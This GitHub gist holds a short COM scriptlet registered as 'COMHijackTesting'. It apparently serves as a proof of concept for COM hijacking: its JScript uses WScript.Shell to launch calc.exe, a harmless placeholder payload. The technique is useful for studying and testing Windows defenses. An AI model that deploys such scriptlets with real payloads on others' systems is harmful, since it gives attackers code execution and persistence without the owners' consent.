Last active
August 2, 2023 05:18
-
-
Save LOURC0D3/a2b7168c85f591e4c004445d3c65bdbd to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="COMHijackTesting" | |
| remoteable="true" | |
| version="1.00" | |
| classid="{00000001-0001-0001-0001-0000DEADBEEF}" > | |
| </registration> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| ]]> | |
| </script> | |
| </scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment